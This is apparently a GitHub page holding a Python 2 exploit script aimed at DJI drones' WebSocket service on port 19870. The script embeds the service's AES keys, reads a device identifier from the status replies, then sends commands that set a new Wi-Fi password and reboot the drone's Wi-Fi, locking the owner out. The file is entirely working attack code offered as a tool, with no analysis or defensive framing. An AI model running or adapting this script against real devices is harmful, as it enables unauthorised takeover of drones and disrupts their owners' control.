-
Notifications
You must be signed in to change notification settings - Fork 19
/
dji_ws_exploit.py
120 lines (94 loc) · 3.53 KB
/
dji_ws_exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
import sys
import argparse
from websocket import *
import base64
from Crypto.Cipher import AES
import json
CMD_SETPASS = '{"SEQ":"12345","CMD":"SetPasswordEx","VALUE":"%s"}'
CMD_REBOOT = '{"SEQ":"12345","CMD":"DoRebootWifi"}'
class dji_WebSocket(WebSocket):
key_out = "e86aada34f6775290ba62ef372f0289f"
key_in = "d93fedf01f9642769bd82ca098d1368f"
def __init__(self, encryption=True, get_mask_key=None, sockopt=None, sslopt=None,
fire_cont_frame=False, enable_multithread=False,
skip_utf8_validation=False, **_):
self.encryption = encryption
super(dji_WebSocket, self).__init__(get_mask_key, sockopt, sslopt,
fire_cont_frame, enable_multithread,
skip_utf8_validation, **_)
def encrypt(self, raw):
padded = self._pad(raw)
iv = '\x00' * AES.block_size
cipher = AES.new(self.key_in, AES.MODE_CBC, iv)
enc = cipher.encrypt(padded)
return base64.b64encode(enc)
def decrypt(self, enc):
raw = base64.b64decode(enc)
iv = '\x00' * AES.block_size
cipher = AES.new(self.key_out, AES.MODE_CBC, iv)
return self._unpad(cipher.decrypt(raw))
def _pad(self, s):
return s + (AES.block_size - len(s) % AES.block_size) * chr(AES.block_size - len(s) % AES.block_size)
def _unpad(self, s):
return s[:-ord(s[len(s)-1:])]
def send(self, payload, opcode=ABNF.OPCODE_TEXT):
if self.encryption:
data = self.encrypt(payload)
else:
data = payload
super(dji_WebSocket, self).send(data)
def recv(self):
buf = super(dji_WebSocket, self).recv()
if self.encryption:
data = self.decrypt(buf)
else:
data = buf
return data
def wf_exploit(target, pwd):
enc = False
ws = dji_WebSocket(encryption=enc)
ws_general = "ws://%s:19870/general" % target
print "[*] Connecting to %s" % ws_general
ws.connect(ws_general)
data = ws.recv()
if data.find('"') == -1 and data.find(':') == -1:
enc = True
print "[*] Determined encryption: %s" % ("enabled" if enc else "disabled")
ws.close()
ws.encryption = enc
ws.connect(ws_general)
try:
# Depending on the aircraft model the server may return another number of replies
appstatus = ws.recv()
appversion = ws.recv()
devicestatus = ws.recv()
event1 = ws.recv()
event2 = ws.recv()
dev_hash = json.loads(devicestatus)["FILE"]
print "[*] Grabbed id value: %s" % dev_hash
ws.close()
wf_cfg = "/controller/wifi/%s" % dev_hash
if not devicestatus.find(wf_cfg):
print "[-] Cannot find wi-fi settings url"
exit(0)
ws_wifi = "ws://%s:19870/controller/wifi/%s" % (target, dev_hash)
print "[*] Connecting to %s" % ws_wifi
ws.connect(ws_wifi)
# ws.recv()
print "[*] Setting new password for wi-fi network"
ws.send(CMD_SETPASS % pwd)
ws.recv()
print "[*] Rebooting wi-fi"
ws.send(CMD_REBOOT)
ws.recv()
print "[!] Success"
except WebSocketException as e:
print e
def parse_args():
parser = argparse.ArgumentParser(description="DJI web socket utilization tool")
parser.add_argument("target", help="Target domain name or ip address")
parser.add_argument("password", help="New wi-fi password")
return parser.parse_args()
if __name__ == "__main__":
args = parse_args()
wf_exploit(args.target, args.password)